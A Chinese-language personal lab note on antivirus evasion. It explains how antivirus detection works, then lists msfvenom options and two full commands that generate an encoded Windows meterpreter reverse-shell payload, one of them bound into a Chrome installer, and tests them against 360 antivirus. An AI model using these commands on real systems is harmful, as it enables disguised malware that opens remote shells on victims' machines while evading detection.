免杀基础笔记
免杀基础概念
免杀一般指反病毒技术,在一些特定情况下或者实际场景下获得目标靶机后,因存在杀毒软件的检测,所以很多脚本等都无法使用,这是需要一种木马或脚本免于被杀毒软件查杀的技术。
免杀涉及到的内容比较多,基本的免杀多是修改木马内容,改变其特征码,捆绑,加壳,分离等。
免杀感觉更偏向于逆写和二进制(不是全部),对于web安全入门,多使用msf和cs进行免杀测试,之后能力提升后,可以自己编写免杀脚本。
杀毒软件检测方式
静态查杀
一般根据特征码识别,对文件进行特征码匹配。将扫描信息与病毒数据库进行对照,如果信息与其中的任何一个病毒特征符合,杀毒软件就会判断此文件被病毒感染。杀毒软件在进行查杀的时候,会挑选文件内部的一段或者几段代码来作为他识别病毒的方式,这种代码就叫做病毒的特征码;在病毒样本中,抽取特征代码;抽取的代码比较特殊,不大可能与普通正常程序代码吻合;抽取的代码要有适当长度,一方面维持特征代码的唯一性,另一方面保证病毒扫描时候不要有太大的空间与时间的开销。
云查杀
查杀原理是对文件内容和行为的检测
行为查杀/动态查杀
对目标产生的行为进行检测,即对即将执行的指令进行检测
扫描查杀方式
1、扫描压缩包技术:即是对压缩包案和封装文件作分析检查的技术。
2、程序窜改防护:即是避免恶意程序借由删除杀毒侦测程序而大肆破坏电脑。
3、修复技术:即是对恶意程序所损坏的文件进行还原
4、急救盘杀毒:利用空白U盘制作急救启动盘,来检测电脑病毒。
5、智能扫描:扫描最常用的磁盘,系统关键位置,耗时较短。
6、全盘扫描:扫描电脑全部磁盘,耗时较长。
7、勒索软件防护:保护电脑中的文件不被黑客恶意加密。
8、开机扫描:当电脑开机时自动进行扫描,可以扫描压缩文档和可能不需要的程序
监控技术
内存监控:当内存中注入病毒时,进行删除等操作
文件监控:当文件被越权改动,或写入磁盘时存在病毒时进行查杀
网页保护:阻止非法网站的窃取和非法文件下载
其他的还有主动防御技术,机器学习识别技术(人工智能识别技术),进程行为检测法()沙盒模式,文件校验法等等
基础免杀于msfvenom工具
简单免杀多是改变进程名称,图标,文件名称,文件属性,加壳,对木马进行编码,修改源码的特征码,对shellcode进行二次编译,使用免杀生成器,加载器等。
msFvenom是msfpayload和msfencode的组合,msFvenom目前已经无法单独使用绕过免杀。
-p 指定使用的payload
-l 列出指定模块的可用资源:payloads encodes nops all
-n 为payload预定一个NOP的滑动长度
-f 指定输出格式
-e 指定需要的编码格式
-a 指定payload的目标架构 x86|x64|x86_64
-platform 指定目标平台
-s 设置文件大小
-i 设置编码次数
-o 指定payload存放位置
简单使用
kali下执行
1 | msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.56.128 LPORT=7777 -e x86/shikata_ga_nai -i 30 -b '\x00' -f exe -o shell.exe |
该命令是指制作一个windows x86架构的反向shell,其中设置监听主机为ip和port,编码格式下为
shikat_ga_nai (不包含\x00字符即空字符)(此处编码了30次)的名为shell.exe的可执行脚本。
放到/上传到指定系统双击运行即可。(因为安装的360杀毒很久之前就已经可以检测出来了,就不展示了^__^
msfvenom进行捆绑软件木马
1 | msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.65.128 LPORT=7777 -e x86/shikata_ga_nai -i 30 -b '\x00' -x setchrome.exe -f exe -o shell.exe |
- 图中ip的65写成了56,唉又重新做了一遍,哭。
发现360杀毒并未检测出来病毒(360杀毒安装时间为23-12-15日,但过了大约1分钟后被查杀出)(但第二次上传后,未进行扫描,且断开网络后360并未查杀,(个人猜测:感觉是本地库下扫描未检出,但联网后的云检测可以检测出来(个人猜想不一定正确^__^))
下一步开始执行安装程序(下载kali开启监听
操作时突然发现一个盲点:kali目前只有一个网卡,windows10有两个,但要互ping就要使用VM8网卡,而这个网卡又连着网络,一连网就查杀。无奈再给kali一个网卡vm2,重新走一遍流程。哭,kali默认的atuo lo就只有一个网卡,还得重新静态路由。!!!
重来:
重新生成->window10禁止上网->打开360->木马查杀->kali msf监听->双击运行(对,这一切的一切windows10没开windows defender。)
额返回值还是为空???